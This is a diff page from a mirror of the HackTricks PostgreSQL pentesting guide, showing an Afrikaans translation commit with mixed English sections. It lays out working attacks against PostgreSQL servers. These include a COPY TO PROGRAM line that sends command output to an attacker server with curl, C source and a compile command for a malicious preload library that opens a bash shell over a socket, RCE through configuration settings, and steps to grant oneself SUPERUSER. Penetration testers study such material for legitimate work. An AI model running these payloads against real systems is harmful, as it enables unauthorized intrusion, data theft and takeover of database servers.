Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-16 22:18:27 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['network-services-pentesting/pentesting-postgresql.md', 'win

Browse source
This commit is contained in:
Translator 2024-03-15 21:35:34 +00:00
parent 089e0d91dd
commit f0095f06b8
2 changed files with 377 additions and 737 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

179
network-services-pentesting/pentesting-postgresql.md
View file

@ -10,14 +10,14 @@ Kry Toegang Vandag:
<details>
<summary><strong>Leer AWS hak vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS hak van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Ander maniere om HackTricks te ondersteun:
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Deel jou haktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
@ -90,7 +90,7 @@ msf> use auxiliary/scanner/postgres/postgres_dbname_flag_injection
### **Poort skandering**
Volgens [**hierdie navorsing**](https://www.exploit-db.com/papers/13084), wanneer 'n verbindingspoging misluk, gooi `dblink` 'n `sqlclient_unable_to_establish_sqlconnection`-uitsondering wat 'n verduideliking van die fout insluit. Voorbeelde van hierdie besonderhede word hieronder gelys.
Volgens [**hierdie navorsing**](https://www.exploit-db.com/papers/13084), wanneer 'n verbindingspoging misluk, gooi `dblink` 'n `sqlclient_unable_to_establish_sqlconnection` uitsondering wat 'n verduideliking van die fout insluit. Voorbeelde van hierdie besonderhede word hieronder gelys.
```sql
SELECT * FROM dblink_connect('host=1.2.3.4
port=5678
@ -101,7 +101,7 @@ connect_timeout=10');
```
* Gasheer is af
`DETAIL: kon nie aan die bediener koppel nie: Geen roete na gasheer Is die bediener aan die hardloop op gasheer "1.2.3.4" en aanvaar dit TCP/IP-koppeling op poort 5678?`
`DETAIL: kon nie aan die bediener koppel nie: Geen roete na gasheer Is die bediener aan die hardloop op gasheer "1.2.3.4" en aanvaar TCP/IP-koppeling op poort 5678?`
* Poort is toe
```
@ -117,31 +117,27 @@ the server terminated abnormally before or while processing the request
#### PostgreSQL Enumeration
PostgreSQL kan geënumereer word deur die volgende stappe te volg:
During the enumeration phase, the following information can be gathered:
1. **Port Scanning**: Skandeer vir die PostgreSQL-diens op die bedryf se poorte.
2. **Banner Grabbing**: Verkryg inligting oor die PostgreSQL-diens deur die banier te gryp.
3. **Version Detection**: Identifiseer die weergawe van die PostgreSQL-diens.
4. **User Enumeration**: Identifiseer geldige gebruikers in die PostgreSQL-databasis.
5. **Database Enumeration**: Identifiseer die databasisse wat beskikbaar is op die PostgreSQL-diens.
1. **Version**: Use tools like `pg_version` to identify the PostgreSQL version running on the target system.
2. **Users and Databases**: Enumerate the users and databases using SQL queries like `SELECT * FROM pg_user` and `SELECT * FROM pg_database`.
3. **Configuration Settings**: Check the configuration settings by querying `SHOW all`.
#### PostgreSQL Exploitation
PostgreSQL kan geëxploiteer word deur die volgende metodes:
Common exploitation techniques include:
1. **Brute Force**: Voer 'n aanval uit om die wagwoorde van PostgreSQL-gebruikers te agterhaal.
2. **SQL Injection**: Benut SQL-injeksiekwessies om toegang tot die databasis te verkry.
3. **File Inclusion**: Exploiteer lêerinsluitingskwessies om die PostgreSQL-diens te kompromiteer.
4. **Privilege Escalation**: Identifiseer en benut priviligie-ontsnappingskwessies om hoër toegangsniveaus te verkry.
1. **Brute Forcing**: Attempt to brute force PostgreSQL user accounts using tools like `Hydra` or custom scripts.
2. **SQL Injection**: Exploit SQL injection vulnerabilities to gain unauthorized access to the database.
3. **Weak Passwords**: Check for weak passwords among PostgreSQL users and attempt to crack them using tools like `John the Ripper`.
#### PostgreSQL Post-Exploitation
Na die suksesvolle uitbuiting van PostgreSQL, kan die aanvaller die volgende aksies onderneem:
After gaining access to the PostgreSQL database, the following actions can be performed:
1. **Data Extraction**: Steel sensitiwiteitsdata uit die PostgreSQL-databasis.
2. **Persistence**: Stel volhoubaarheid in om toegang tot die PostgreSQL-diens te behou.
3. **Covering Tracks**: Verwyder enige spore van die aanval om opsporing te voorkom.
4. **Privilege Escalation**: Verhoog toegangsniveaus binne die PostgreSQL-omgewing.
1. **Data Extraction**: Extract sensitive data from the database using SQL queries.
2. **Privilege Escalation**: Attempt to escalate privileges by exploiting misconfigurations or vulnerabilities in the PostgreSQL server.
3. **Covering Tracks**: Remove evidence of the attack by deleting logs and other traces of unauthorized access.
```
DETAIL: FATAL: password authentication failed for user "name"
```
@ -150,7 +146,7 @@ DETAIL: FATAL: password authentication failed for user "name"
DETAIL: could not connect to server: Connection timed out Is the server
running on host "1.2.3.4" and accepting TCP/IP connections on port 5678?
```
In PL/pgSQL funksies, is dit tans nie moontlik om uitsonderingsbesonderhede te verkry nie. Indien jy egter direkte toegang tot die PostgreSQL-bediener het, kan jy die nodige inligting terugkry. As dit nie haalbaar is om gebruikersname en wagwoorde uit die stelseltabelle te onttrek nie, kan jy oorweeg om die woordelysaanvalmetode te gebruik wat bespreek word in die vorige afdeling, aangesien dit moontlik positiewe resultate kan oplewer.
In PL/pgSQL funksies, is dit tans nie moontlik om uitsonderingsbesonderhede te verkry nie. Indien jy egter direkte toegang tot die PostgreSQL-bediener het, kan jy die nodige inligting terugkry. As dit nie haalbaar is om gebruikersname en wagwoorde uit die stelseltabelle te onttrek nie, kan jy oorweeg om die woordelysaanvalmetode wat bespreek is in die vorige afdeling, te gebruik, aangesien dit moontlik positiewe resultate kan oplewer.
## Enumerasie van Voorregte
@ -162,13 +158,13 @@ In PL/pgSQL funksies, is dit tans nie moontlik om uitsonderingsbesonderhede te v
| rolinherit | Rol erf outomaties voorregte van rolle waarvan dit 'n lid is |
| rolcreaterole | Rol kan meer rolle skep |
| rolcreatedb | Rol kan databasisse skep |
| rolcanlogin | Rol kan aanmeld. Dit beteken dat hierdie rol as die aanvanklike sessie-outorisasie-identifiseerder gegee kan word |
| rolreplication | Rol is 'n replikasie rol. 'n Replikasie rol kan replikasieverbindinge inisieer en replikasieslotte skep en verwyder. |
| rolconnlimit | Vir rolle wat kan aanmeld, stel dit die maksimum aantal gelyktydige verbindinge in wat hierdie rol kan maak. -1 beteken geen limiet. |
| rolpassword | Nie die wagwoord (lees altyd as `********`) |
| rolcanlogin | Rol kan aanteken. Dit beteken dat hierdie rol as die aanvanklike sessie-outorisasie-identifiseerder gegee kan word |
| rolreplication | Rol is 'n replikasie rol. 'n replikasie rol kan replikasieverbindinge inisieer en replikasiegleuwe skep en verwyder |
| rolconnlimit | Vir rolle wat kan aanteken, stel dit die maksimum aantal gelyktydige verbindinge in wat hierdie rol kan maak. -1 beteken geen limiet nie |
| rolpassword | Nie die wagwoord nie (lees altyd as `********`) |
| rolvaliduntil | Wagwoordvervaltyd (slegs gebruik vir wagwoordverifikasie); nul indien geen verval |
| rolbypassrls | Rol verbygaan elke ryvlak-sekuriteitsbeleid, sien [Afdeling 5.8](https://www.postgresql.org/docs/current/ddl-rowsecurity.html) vir meer inligting. |
| rolconfig | Rol-spesifieke verstekwaardes vir hardlooptydkonfigurasie-veranderlikes |
| rolbypassrls | Rol verbygaan elke ryvlak-sekuriteitsbeleid, sien [Afdeling 5.8](https://www.postgresql.org/docs/current/ddl-rowsecurity.html) vir meer inligting |
| rolconfig | Rol-spesifieke verstekwaardes vir hardlooptydkonfigurasie-veranderlikes |
| oid | ID van rol |
#### Interessante Groepe
@ -178,7 +174,7 @@ In PL/pgSQL funksies, is dit tans nie moontlik om uitsonderingsbesonderhede te v
* As jy 'n lid is van **`pg_write_server_files`** kan jy **lêers skryf**
{% hint style="info" %}
Let daarop dat in Postgres 'n **gebruiker**, 'n **groep** en 'n **rol** dieselfde is. Dit hang net af van **hoe jy dit gebruik** en of jy dit toelaat om aan te meld.
Let daarop dat in Postgres 'n **gebruiker**, 'n **groep** en 'n **rol** dieselfde is. Dit hang net af van **hoe jy dit gebruik** en of jy dit toelaat om in te teken.
{% endhint %}
```sql
# Get users roles
@ -313,14 +309,14 @@ copy (select convert_from(decode('<ENCODED_PAYLOAD>','base64'),'utf-8')) to '/ju
{% endcode %}
{% hint style="warning" %}
Onthou dat as jy nie 'n supergebruiker is nie, maar die **`CREATEROLE`**-permissies het, kan jy **jouself lid van daardie groep maak:**
Onthou dat as jy nie 'n supergebruiker is nie, maar wel die **`CREATEROLE`**-permissies het, kan jy **jouself lid van daardie groep maak:**
```sql
GRANT pg_write_server_files TO username;
```
[**Meer inligting.**](pentesting-postgresql.md#privilege-escalation-with-createrole)
{% endhint %}
Onthou dat KOPIE nie nuwe lynkarakters kan hanteer nie, daarom moet jy selfs as jy 'n base64-lading gebruik 'n eenlynstuk stuur. 'n Baie belangrike beperking van hierdie tegniek is dat `copy` nie gebruik kan word om binêre lêers te skryf nie, omdat dit sommige binêre waardes wysig.
Onthou dat KOPIE nie nuwe lynkarakters kan hanteer nie, daarom moet jy selfs as jy 'n base64-lading gebruik 'n eenlynstuk stuur. 'n Baie belangrike beperking van hierdie tegniek is dat `copy` nie gebruik kan word om binêre lêers te skryf nie omdat dit sekere binêre waardes wysig.
### Oplaai van binêre lêers
@ -336,29 +332,33 @@ Daar is egter ander tegnieke om groot binêre lêers op te laai:
{% embed url="https://go.intigriti.com/hacktricks" %}
### Opdatering van PostgreSQL tabeldata via plaaslike lêerskryf
As jy die nodige regte het om PostgreSQL-bedienerlêers te lees en te skryf, kan jy enige tabel op die bediener opdateer deur die geassosieerde lêernode in [die PostgreSQL-datagids](https://www.postgresql.org/docs/8.1/storage.html) te oorskryf.
Meer oor hierdie tegniek [hier](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users).
### Opdatering van PostgreSQL tabeldata via plaaslike lêer skryf
As jy die nodige regte het om PostgreSQL-bedienerlêers te lees en te skryf, kan jy enige tabel op die bediener opdateer deur die geassosieerde lêernode te **oorweldig in [die PostgreSQL data-gids](https://www.postgresql.org/docs/8.1/storage.html)**. **Meer oor hierdie tegniek** [**hier**](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users).
Vereiste stappe:
1. Kry die PostgreSQL-datagids
1. Kry die PostgreSQL data-gids
```sql
SELECT setting FROM pg_settings WHERE name = 'data_directory';
```
**Nota:** As jy nie die huidige datagidsbaan uit instellings kan kry nie, kan jy die hoof PostgreSQL-weergawe deur die `SELECT version()`-navraag kry en probeer om die baan met geweld te vind. Gewone datagidsbane op Unix-installasies van PostgreSQL is `/var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/`. 'n Gewone klasternaam is `main`.
**Nota:** As jy nie die huidige data-gidspad vanaf instellings kan kry nie, kan jy die hoof PostgreSQL-weergawe deur die `SELECT version()`-navraag kry en probeer om die pad met brutaalkrag te vind. Gewone data-gidspaaie op Unix-installasies van PostgreSQL is `/var/lib/PostgreSQL/MAJOR_VERSION/CLUSTER_NAME/`. 'n Gewone klasternaam is `main`.
2. Kry 'n relatiewe pad na die lêernode wat geassosieer is met die teikentabel
2. Kry 'n relatiewe pad na die lêernode wat met die teikentabel geassosieer is
```sql
SELECT pg_relation_filepath('{TABLE_NAME}')
SELECT pg_relation_filepath('{TABEL_NAAM}')
```
Hierdie navraag behoort iets soos `base/3/1337` terug te gee. Die volledige pad op skyf sal wees `$DATA_DIRECTORY/base/3/1337`, m.a.w. `/var/lib/postgresql/13/main/base/3/1337`.
Hierdie navraag behoort iets soos `base/3/1337` terug te gee. Die volledige pad op skyf sal wees `$DATA_GIDS/base/3/1337`, m.a.w. `/var/lib/postgresql/13/main/base/3/1337`.
3. Laai die lêernode af deur die `lo_*`-funksies
```sql
SELECT lo_import('{PSQL_DATA_DIRECTORY}/{RELATION_FILEPATH}',13337)
SELECT lo_import('{PSQL_DATA_GIDS}/{RELATION_FILEPATH}',13337)
```
4. Kry die datatipe wat met die teikentabel geassosieer is
4. Kry die datatipe wat geassosieer is met die teikentabel
```sql
SELECT
STRING_AGG(
@ -376,32 +376,35 @@ JOIN pg_type
ON pg_attribute.atttypid = pg_type.oid
JOIN pg_class
ON pg_attribute.attrelid = pg_class.oid
WHERE pg_class.relname = '{TABLE_NAME}';
WHERE pg_class.relname = '{TABEL_NAAM}';
```
5. Gebruik die [PostgreSQL Filenode Editor](https://github.com/adeadfed/postgresql-filenode-editor) om [die lêernode te wysig](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users); stel alle `rol*` booleaanse vlae op 1 vir volle regte.
5. Gebruik die [PostgreSQL Filenode Editor](https://github.com/adeadfed/postgresql-filenode-editor) om [die lêernode te wysig](https://adeadfed.com/posts/updating-postgresql-data-without-update/#updating-custom-table-users); stel alle `rol*` booleaanse vlae na 1 vir volle regte.
```bash
python3 postgresql_filenode_editor.py -f {FILENODE} --datatype-csv {DATATYPE_CSV_FROM_STEP_4} -m update -p 0 -i ITEM_ID --csv-data {CSV_DATA}
python3 postgresql_filenode_editor.py -f {LÊERNODE} --datatype-csv {DATATYPE_CSV_VAN_STAP_4} -m update -p 0 -i ITEM_ID --csv-data {CSV_DATA}
```
![PostgreSQL Filenode Editor Demo](https://raw.githubusercontent.com/adeadfed/postgresql-filenode-editor/main/demo/demo_datatype.gif)
7. Laai die gewysigde lêernode weer op deur die `lo_*`-funksies, en oorskryf die oorspronklike lêer op die skyf
![PostgreSQL Filenode Editor Demo](https://raw.githubusercontent.com/adeadfed/postgresql-filenode-editor/main/demo/demo_datatipe.gif)
6. Laai die gewysigde lêernode weer op deur die `lo_*`-funksies, en oorskryf die oorspronklike lêer op die skyf
```sql
SELECT lo_from_bytea(13338,decode('{BASE64_ENCODED_EDITED_FILENODE}','base64'))
SELECT lo_export(13338,'{PSQL_DATA_DIRECTORY}/{RELATION_FILEPATH}')
SELECT lo_from_bytea(13338,decode('{BASE64_GEËDITEERDE_LÊERNODE}','base64'))
SELECT lo_export(13338,'{PSQL_DATA_GIDS}/{RELATION_FILEPATH}')
```
8. *(Opsioneel)* Maak die in-memory tabelkassie skoon deur 'n duur SQL-navraag uit te voer
7. _(Opsioneel)_ Maak die in-memory tabelkas leeg deur 'n duur SQL-navraag uit te voer
```sql
SELECT lo_from_bytea(133337, (SELECT REPEAT('a', 128*1024*1024))::bytea)
```
9. Jy behoort nou opgedateerde tabelwaardes in die PostgreSQL te sien.
Jy kan ook 'n superadmin word deur die `pg_authid`-tabel te wysig. **Sien [die volgende afdeling](pentesting-postgresql.md#privesc-by-overwriting-internal-postgresql-tables)**.
8. Jy behoort nou opgedateerde tabelwaardes in die PostgreSQL te sien.
Jy kan ook 'n superadmin word deur die `pg_authid`-tabel te wysig. **Sien** [**die volgende afdeling**](pentesting-postgresql.md#privesc-by-overwriting-internal-postgresql-tables).
## RCE
### **RCE na program**
Vanaf [weergawe 9.3](https://www.postgresql.org/docs/9.3/release-9-3.html) kan slegs **supergebruikers** en lede van die groep **`pg_execute_server_program`** kopie vir RCE gebruik (voorbeeld met uitlekking:
Vanaf [weergawe 9.3](https://www.postgresql.org/docs/9.3/release-9-3.html), kan slegs **supergebruikers** en lede van die groep **`pg_execute_server_program`** kopie gebruik vir RCE (voorbeeld met eksfiltrering:
```sql
'; copy (SELECT '') to program 'curl http://YOUR-SERVER?f=`ls -l|base64`'-- -
```
@ -427,7 +430,7 @@ GRANT pg_execute_server_program TO username;
{% endhint %}
Of gebruik die `multi/postgres/postgres_copy_from_program_cmd_exec` module van **metasploit**.\
Meer inligting oor hierdie kwesbaarheid [**hier**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5). Terwyl dit as CVE-2019-9193 gerapporteer is, het Postges verklaar dat dit 'n [kenmerk is en nie reggestel sal word nie](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/).
Meer inligting oor hierdie kwesbaarheid [**hier**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5). Terwyl dit as CVE-2019-9193 gerapporteer is, het Postges verklaar dat dit 'n [kenmerk is en nie reggemaak sal word nie](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/).
### RCE met PostgreSQL Tale
@ -437,15 +440,16 @@ Meer inligting oor hierdie kwesbaarheid [**hier**](https://medium.com/greenwolf-
### RCE met PostgreSQL-uitbreidings
Nadat jy uit die vorige pos geleer het **hoe om binêre lêers te oplaai**, kan jy probeer om **RCE te verkry deur 'n postgresql-uitbreiding op te laai en dit te laai**.
Sodra jy **geleer** het van die vorige pos **hoe om binêre lêers te oplaai** kan jy probeer om **RCE te verkry deur 'n postgresql-uitbreiding op te laai en dit te laai**.
{% content-ref url="../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md" %}
[rce-with-postgresql-extensions.md](../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md)
{% endcontent-ref %}
### PostgreSQL konfigurasie lêer RCE
### PostgreSQL konfigurasie-lêer RCE
{% hint style="info" %}
Die volgende RCE-vectors is veral nuttig in beperkte SQLi-kontekste, aangesien alle stappe deur geneste SELECT-stellings uitgevoer kan word
Die volgende RCE-vektore is veral nuttig in beperkte SQLi-kontekste, aangesien alle stappe deur geneste SELECT-stellings uitgevoer kan word
{% endhint %}
Die **konfigurasie-lêer** van PostgreSQL is **skryfbaar** deur die **postgres-gebruiker**, wat die een is wat die databasis hardloop, sodat jy as **supergebruiker** lêers in die lêersisteem kan skryf, en dus kan jy **hierdie lêer oorskryf.**
@ -458,14 +462,14 @@ Meer inligting [oor hierdie tegniek hier](https://pulsesecurity.co.nz/articles/p
Die konfigurasie-lêer het 'n paar interessante eienskappe wat tot RCE kan lei:
- `ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'` Pad na die privaatsleutel van die databasis
- `ssl_passphrase_command = ''` As die privaat lêer deur 'n wagwoord beskerm word (geënkripteer) sal postgresql die opdrag aangedui in hierdie eienskap **uitvoer**.
- `ssl_passphrase_command_supports_reload = off` **Indien** hierdie eienskap **aan** is, sal die **opdrag** uitgevoer word as die sleutel deur 'n wagwoord beskerm word wanneer `pg_reload_conf()` **uitgevoer** word.
* `ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'` Pad na die privaatsleutel van die databasis
* `ssl_passphrase_command = ''` As die privaat lêer deur 'n wagwoord beskerm word (geënkripteer) sal postgresql die opdrag wat in hierdie eienskap aangedui word **uitvoer**.
* `ssl_passphrase_command_supports_reload = off` **Indien** hierdie eienskap **aan** is, sal die **opdrag** uitgevoer word as die sleutel deur 'n wagwoord beskerm word wanneer `pg_reload_conf()` **uitgevoer** word.
Dan sal 'n aanvaller moet:
1. **Dump privaatsleutel** van die bediener
2. **Enkripteer** afgelaai privaatsleutel:
2. **Enkripteer** afgelaaide privaatsleutel:
1. `rsa -aes256 -in afgelaai-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key`
3. **Oorskryf**
4. **Dump** die huidige postgresql **konfigurasie**
@ -474,7 +478,7 @@ Dan sal 'n aanvaller moet:
2. `ssl_passphrase_command_supports_reload = on`
6. Voer `pg_reload_conf()` uit
Tydens toetsing het ek opgemerk dat dit slegs sal werk as die **privaatsleutel-lêer bevoegdhede 640** het, dit **deur root besit word** en deur die **groep ssl-cert of postgres** (sodat die postgres-gebruiker dit kan lees), en in _/var/lib/postgresql/12/main_ geplaas is.
Tydens die toets van hierdie het ek opgemerk dat dit net sal werk as die **privaatsleutel-lêer bevoegdhede 640** het, dit **deur root besit word** en deur die **groep ssl-cert of postgres** (sodat die postgres-gebruiker dit kan lees), en in _/var/lib/postgresql/12/main_ geplaas is.
#### **RCE met archive\_command**
@ -482,7 +486,7 @@ Tydens toetsing het ek opgemerk dat dit slegs sal werk as die **privaatsleutel-l
'n Ander eienskap in die konfigurasie-lêer wat uitgebuit kan word, is `archive_command`.
Om dit te laat werk, moet die `archive_mode` instelling `'aan'` of `'altyd'` wees. As dit waar is, kan ons die opdrag in `archive_command` oorskryf en dit dwing om uit te voer via die WAL (write-ahead logging) operasies.
Om dit te laat werk, moet die `archive_mode`-instelling `'aan'` of `'altyd'` wees. As dit waar is, kan ons die opdrag in `archive_command` oorskryf en dit dwing om via die WAL (write-ahead logging) operasies uit te voer.
Die algemene stappe is:
@ -492,21 +496,24 @@ Die algemene stappe is:
4. Dwings die WAL-operasie om uit te voer, wat die argiefopdrag sal aanroep: `SELECT pg_switch_wal()` of `SELECT pg_switch_xlog()` vir sommige Postgres-weergawes
#### **RCE met voorlaai biblioteke**
Meer inligting [oor hierdie tegniek hier](https://adeadfed.com/posts/postgresql-select-only-rce/).
Hierdie aanvalvektor maak gebruik van die volgende konfigurasie-veranderlikes:
- `session_preload_libraries` -- biblioteke wat deur die PostgreSQL-bedieners by die kliëntverbinding gelaai sal word.
- `dynamic_library_path` -- lys van gids waar die PostgreSQL-bedieners na die biblioteke sal soek.
Ons kan die `dynamic_library_path`-waarde instel op 'n gids wat deur die `postgres`-gebruiker wat die databasis hardloop, skryfbaar is, byvoorbeeld die `/tmp/`-gids, en 'n skadelike `.so`-voorwerp daar oplaai. Vervolgens sal ons die PostgreSQL-bedieners dwing om ons nuutgelaai biblioteek te laai deur dit in die `session_preload_libraries`-veranderlike in te sluit.
* `session_preload_libraries` -- biblioteke wat deur die PostgreSQL-bedienaar by die kliëntverbinding gelaai sal word.
* `dynamic_library_path` -- lys van gids waar die PostgreSQL-bedienaar vir die biblioteke sal soek.
Ons kan die `dynamic_library_path`-waarde instel op 'n gids wat deur die `postgres`-gebruiker wat die databasis hardloop, skryfbaar is, byvoorbeeld die `/tmp/`-gids, en 'n skadelike `.so`-voorwerp daar oplaai. Vervolgens sal ons die PostgreSQL-bedienaar dwing om ons nuutgelaai biblioteek te laai deur dit in die `session_preload_libraries`-veranderlike in te sluit.
Die aanvalstappe is:
1. Laai die oorspronklike `postgresql.conf` af
2. Sluit die `/tmp/`-gids in die `dynamic_library_path`-waarde in, byvoorbeeld `dynamic_library_path = '/tmp:$libdir'`
3. Sluit die skadelike biblioteeknaam in die `session_preload_libraries`-waarde in, byvoorbeeld `session_preload_libraries = 'payload.so'`
4. Kontroleer die hoof PostgreSQL-weergawe via die `SELECT version()`-navraag
5. Kompileer die skadelike biblioteekkode met die korrekte PostgreSQL-ontwikkelingspakket
Voorbeeldkode:
5. Kompileer die skadelike biblioteekkode met die korrekte PostgreSQL-dev-pakket Voorbeeldkode:
```c
#include <stdio.h>
#include <sys/socket.h>
@ -545,7 +552,9 @@ char * const argv[] = {"/bin/bash", NULL};
execve("/bin/bash", argv, NULL);
}
```
Kompilering van die kode:
```bash
gcc -I$(pg_config --includedir-server) -shared -fPIC -nostartfiles -o payload.so payload.c
```
@ -561,7 +570,7 @@ gcc -I$(pg_config --includedir-server) -shared -fPIC -nostartfiles -o payload.so
Volgens die [**dokumentasie**](https://www.postgresql.org/docs/13/sql-grant.html): _Rolle met die **`CREATEROLE`** voorreg kan **lidmaatskap in enige rol toeken of herroep** wat **nie** 'n **supergebruiker** is nie._
Dus, as jy die **`CREATEROLE`** toestemming het, kan jy jouself toegang gee tot ander **rolle** (wat nie supergebruikers is nie) wat jou die opsie kan gee om lêers te lees en skryf en opdragte uit te voer:
Dus, as jy **`CREATEROLE`** toestemming het, kan jy jouself toegang gee tot ander **rolle** (wat nie supergebruikers is nie) wat jou die opsie kan gee om lêers te lees en skryf en opdragte uit te voer:
```sql
# Access to execute commands
GRANT pg_execute_server_program TO username;
@ -579,7 +588,7 @@ ALTER USER user_name WITH PASSWORD 'new_password';
```
#### Privesc na SUPERUSER
Dit is redelik algemeen om te vind dat **plaaslike gebruikers kan aanmeld by PostgreSQL sonder om enige wagwoord te verskaf**. Daarom, sodra jy **toestemmings om kode uit te voer** ingesamel het, kan jy hierdie toestemmings misbruik om jou die **`SUPERUSER`** rol te gee:
Dit is redelik algemeen om te vind dat **plaaslike gebruikers kan aanmeld by PostgreSQL sonder om enige wagwoord te verskaf**. Daarom, sodra jy **toestemmings om kode uit te voer** ingesamel het, kan jy hierdie toestemmings misbruik om jou **`SUPERUSER`** rol te verkry:
```sql
COPY (select '') to PROGRAM 'psql -U <super_user> -c "ALTER USER <your_username> WITH SUPERUSER;"';
```
@ -597,13 +606,13 @@ host all all ::1/128 trust
### **WYSIG TABEL privesc**
In [**hierdie skrywe**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities) word verduidelik hoe dit moontlik was om **privesc** in Postgres GCP te misbruik deur die ALTER TABLE-voorreg wat aan die gebruiker verleen is.
In [**hierdie skrywe**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities) word verduidelik hoe dit moontlik was om **privesc** in Postgres GCP te bewerkstellig deur misbruik te maak van die ALTER TABLE-voorreg wat aan die gebruiker verleen is.
Wanneer jy probeer om **'n ander gebruiker eienaar van 'n tabel te maak**, behoort jy 'n **fout** te kry wat dit voorkom, maar blykbaar het GCP daardie **opsie aan die nie-supergebruiker postgres-gebruiker** in GCP gegee:
<figure><img src="../.gitbook/assets/image (4) (1) (1) (1) (2) (1) (1).png" alt=""><figcaption></figcaption></figure>
Deur hierdie idee te koppel met die feit dat wanneer die **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html) opdragte uitgevoer word op 'n **tabel met 'n indeksfunksie**, word die **funksie** as deel van die opdrag met die **eienaar se toestemmings** geroep. Dit is moontlik om 'n indeks met 'n funksie te skep en eienaarskapstoestemmings aan 'n **supergebruiker** oor daardie tabel te gee, en dan ANALYZE oor die tabel uit te voer met die skadelike funksie wat opdragte kan uitvoer omdat dit die toestemmings van die eienaar gebruik.
Deur hierdie idee te koppel met die feit dat wanneer die **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html) opdragte uitgevoer word op 'n **tabel met 'n indeksfunksie**, word die **funksie** as deel van die opdrag met die **eienaar se toestemmings** geroep. Dit is moontlik om 'n indeks met 'n funksie te skep en eienaarskapstoestemmings aan 'n **supergebruiker** oor daardie tabel te gee, en dan ANALYZE oor die tabel uit te voer met die skadelike funksie wat bevele kan uitvoer omdat dit die toestemmings van die eienaar gebruik.
```c
GetUserIdAndSecContext(&save_userid, &save_sec_context);
SetUserIdAndSecContext(onerel->rd_rel->relowner,
@ -613,11 +622,11 @@ save_sec_context | SECURITY_RESTRICTED_OPERATION);
1. Begin deur 'n nuwe tabel te skep.
2. Voeg 'n paar irrelevante inhoud by die tabel in om data vir die indeksfunksie te voorsien.
3. Ontwikkel 'n skadelike indeksfunksie wat 'n koderingsuitvoeringslading bevat, wat ongemagtigde bevele moontlik maak.
3. Ontwikkel 'n skadelike indeksfunksie wat 'n koderingsuitvoeringslading bevat, wat ongemagtigde bevele moontlik maak om uitgevoer te word.
4. WYSIG die eienaar van die tabel na "cloudsqladmin," wat GCP se supergebruikersrol is wat uitsluitlik deur Cloud SQL gebruik word om die databasis te bestuur en te onderhou.
5. Voer 'n ANALYSE-operasie op die tabel uit. Hierdie aksie dwing die PostgreSQL-enjin om na die gebruikerskonteks van die tabel se eienaar, "cloudsqladmin," te skakel. Gevolglik word die skadelike indeksfunksie met die regte van "cloudsqladmin" geroep, wat die uitvoering van die voorheen ongemagtigde skul bevel moontlik maak.
In PostgreSQL lyk hierdie vloei soos dit:
In PostgreSQL lyk hierdie vloei so iets:
```sql
CREATE TABLE temp_table (data text);
CREATE TABLE shell_commands_results (data text);
@ -644,7 +653,7 @@ uid=2345(postgres) gid=2345(postgres) groups=2345(postgres)
```
### Plaaslike Aanteken
Sommige verkeerd geconfigureerde postgresql-instanties mag dalk die aanteken van enige plaaslike gebruiker toelaat, dit is moontlik om plaaslik vanaf 127.0.0.1 te aanteken met behulp van die **`dblink`-funksie**:
Sommige verkeerd geconfigureerde postgresql-instanties mag enige plaaslike gebruiker toelaat om in te teken, dit is moontlik om plaaslik in te teken vanaf 127.0.0.1 met behulp van die **`dblink`-funksie**:
```sql
\du * # Get Users
\l # Get databases
@ -663,7 +672,7 @@ CREATE EXTENSION dblink;
```
{% endhint %}
As jy die wagwoord van 'n gebruiker met meer voorregte het, maar die gebruiker nie toegelaat word om vanaf 'n eksterne IP-adres in te teken nie, kan jy die volgende funksie gebruik om navrae as daardie gebruiker uit te voer:
